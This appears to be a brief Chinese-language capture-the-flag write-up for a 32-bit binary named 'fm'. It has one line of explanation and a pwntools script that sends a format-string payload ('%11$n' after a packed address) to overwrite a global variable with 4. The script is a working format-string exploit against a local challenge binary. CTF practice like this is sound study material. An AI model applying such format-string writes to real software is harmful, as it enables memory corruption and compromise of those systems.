题目
题目链接
checksec
IDA
利用格式化字符串漏洞篡改 x 为 4 即可,注意这里是 32 位
exp
1
2
3
4
5
6
7
8
9
10
11
12
| from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
p = process('./fm')
x_addr = p32(0x804A02C)
payload = x_addr + b'%11$n'
p.sendline(payload)
p.interactive()
|
